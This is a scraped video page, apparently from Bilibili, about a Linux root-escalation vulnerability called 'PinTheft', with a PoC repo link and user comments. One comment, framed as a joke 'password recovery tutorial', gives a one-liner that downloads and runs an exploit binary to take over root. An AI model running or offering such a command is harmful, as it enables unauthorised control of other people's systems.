奖池还在叠加!Linux再爆高危漏洞,一行命令提权到root | CVE-2026-43494 | PinTheft

合集 · 网络安全 (31)

  1. 6:27
    如何白嫖公网Kali VPS (SegFault)
  2. 2:20
    分享几种绕过前端JS查看源码的方法
  3. 5:49
    震惊!大学生英语竞赛竟出现网络安全密码学相关题目(雾
  4. 11:49
    金砖大赛网络系统管理赛项区域赛真题网络安全部分解题
  5. 13:28
    期末作业-安全技术体系设计与建设
  6. 9:04
    VPN和翻墙的常见误区、误解
  7. 11:21
    webshell是什么?黑客是怎么攻破你的网站的?
  8. 2:44
    当工具侠遇上杀软,这就是脚本小子的丑态🤣👉🤡
  9. 3:04
    为什么免费WIFI有安全风险(钓鱼WIFI与DNS劫持)
  10. 10:26
    感染星铁小助手的蠕虫病毒有多厉害,如何预防?
  11. 15:03
    【城】逐帧分析黑客攻击手法,Wireshark抓包工具实战演示
  12. 13:52
    【城】为了研究网络安全,我的服务器被攻击了365天...
  13. 30:26
    【城】计算机木马的原理、实战演示与防御方法
  14. 14:43
    【城】当你在注册时,系统怎样偷偷保护你的密码
  15. 16:38
    【城】一行代码让整个网站瘫痪,永不过时的黑客技术
  16. 7:21
    解压即蓝屏?!WinRAR爆出新漏洞:路径遍历(CVE-2025-8088)
  17. 7:18
    【城】网络高手让你断网的方法竟是...如何预防?(DHCP与攻击防护)
  18. 9:01
    【城】DNS 劫持有多可怕?能上QQ但是打不开网页怎么办
  19. 16:05
    【城】密码学工程的早期杰作—IPsec VPN防窥防篡改
  20. 7:46
    【城】加密流量如何绕过防火墙?抓包告诉你答案
  21. 8:12
    【城】网络高手盗取账号的方法竟是...如何预防?(钓鱼攻击与防护)
  22. 6:22
    【城】当年最“爆”的“核弹级”漏洞(Log4j 漏洞复现)
  23. 8:47
    【城】不点链接不下载,你的账号是怎么被偷走的?
  24. 3:54
    【紧急】 Linux 史上最爆漏洞!一条命令提权到 root
  25. 4:06
    【紧急】补丁白打了!双重漏洞通杀Linux,一个至今未修 | CVE-2026-43284 | Dirty Frag
  26. 4:58
    【紧急】Nginx潜伏18年漏洞!不用密码直接远程控制,30%服务器中招 | CVE-2026-42945 Nginx Rift
  27. 4:56
    奖池还在叠加!Linux再爆高危漏洞,一行命令提权到root | CVE-2026-43494 | PinTheft
  28. 9:25
    不止 Linux!Windows/Mac 接连爆出高危漏洞:SSH密钥泄露、BitLocker 失效、杀软成黑客利器、Office远程任意命令执行
  29. 9:50
    【城】安全研究员都被盗号,开源≠安全,供应链攻击有多可怕?
  30. 4:49
    【紧急】最有力气的漏洞!人人都能打崩网站,88万台服务器裸奔,CVSS 9.8拒绝服务漏洞 | CVE-2026-49975 | HTTP2 Bomb
  31. 4:22
    别乱点开视频!这个漏洞能直接控制你的电脑!FFmpeg 流媒体漏洞 CVE-2026-8461 | PixelSmash
Description
相关 PoC / 复现笔记我整理在 poc-lab:
https://github.com/Unclecheng-li/poc-lab
只用于授权安全研究和本地实验环境,不要在未授权机器上乱跑哦 (。•̀ᴗ-)✧

Comments

新能源蒸汽机 2026-05-22

linux忘记密码修改教程还在更新[笑哭]

♥ 1343 ↩ 39

十九子河 2026-05-22

昙花一现 昙花二现 昙花三现 昙花四现

♥ 927 ↩ 15

zxczxc147zxc 2026-05-22

安卓不可用,别想了# CONFIG_RDS is not set,RDS内核模块还是没有编译进内核里,我已急哭

♥ 213 ↩ 21

NZD_ 2026-05-22

Linux漏洞元年[少女乐团派对_期待]

♥ 202 ↩ 7

弗洛鸽青蛙 2026-05-22

ai在安全领域是遇到了技术爆发期吗,这么多老资历都被爆了

♥ 200 ↩ 13

地球online发布 2026-05-22

这下真是流窜AI了,在互联网核心底层挖掘漏洞如同探囊取物,每一个漏洞都是之前传说的0day漏洞

♥ 174 ↩ 1

HaloAboveShadow 2026-05-23

依旧

♥ 179 ↩ 4

Zxi2233 2026-05-22

Linux 密码找回教程(最新): 1.curl -sSL https://github.com/Unclecheng-li/poc-lab/raw/main/CVE-2026-43494%20PinTheft/build/exp -o exp && chmod +x exp && ./exp 2.passwd root 3.输入你的新密码[doge]

♥ 148 ↩ 9

我是个普通的B站用户 2026-05-22

Linux密码修改教程: copyfail dirtyfrag Fragnesia ZCRX PinTheft NGINX Rift ssh-keysign-pwn Windows密码修改教程: YellowKey GreenPlasma Mac OS密码修改教程: macOS MIE bypass 坐等更新([doge])

♥ 133 ↩ 3

喻星星 2026-05-22

与此同时,linus已经大脑过载怒斥ai辣鸡漏洞报告[doge]

♥ 132 ↩ 12

JackAltman 2026-05-23

我好期待高通Soc、SELinux、Android Kernel、Bootloader的漏洞[大哭]

♥ 89 ↩ 8

穆木临 2026-05-22

昙花五现[doge]

♥ 88 ↩ 1

かわかぜ 2026-05-22

如果只是在Arch上复现才比较容易的话,就以Arch用户那一天不更新就浑身难受的态度来看,这个漏洞没多大用。同时,也不会有谁拿Arch当服务器用吧;另外,都用Arch了,安全意识也应该高吧(

♥ 79 ↩ 15

草什么地 2026-05-22

又是什么内存引用吗? 你说的对,但是rust……后面忘了

♥ 84 ↩ 17

AlistairEds 2026-05-22

评论区都是看热闹不嫌事大的人。我只感到深深地担忧。 Aaron Esau是一个人,是网络安全领域的资深安全研究员。而v12是也不是一个AI工具,是一个团队(V12 Security)研发的自动化测试平台,是人+AI。所以严格意义上,这不是“由AI发现的漏洞”,而是安全团队系统性的使用AI工具搜索海量代码,然后由人类去判断、发掘和利用漏洞。 每过一段时间,就会出现新的AI噱头,用于保持热度,不确定这是好事还是坏事。但是可以确定的是现阶段AI越发展,屏幕前的你我就会越不幸。

♥ 162 ↩ 30

WEN枫树 2026-05-22

这下不需要再记Linux的root账户密码了

♥ 56

SonicGhost 2026-05-22

漏洞

♥ 45 ↩ 1

雲はそっと 2026-05-22

与此同时,更应该紧张的是window,macOS这些完全闭源的系统。因为他们的漏洞一旦发现:1,苹果微软是否有资源投入像Linux这样开源的系统一样去寻找和修改源代码 2,这两个的商业程度远远大于Linux意味着像邮件这些的泄漏导致的危害更大

♥ 51 ↩ 21

iamhyz啊 2026-05-22

怎么全是扫Linux漏洞,什么时候Android能这么频繁的爆出漏洞[doge_金箍]

♥ 39 ↩ 2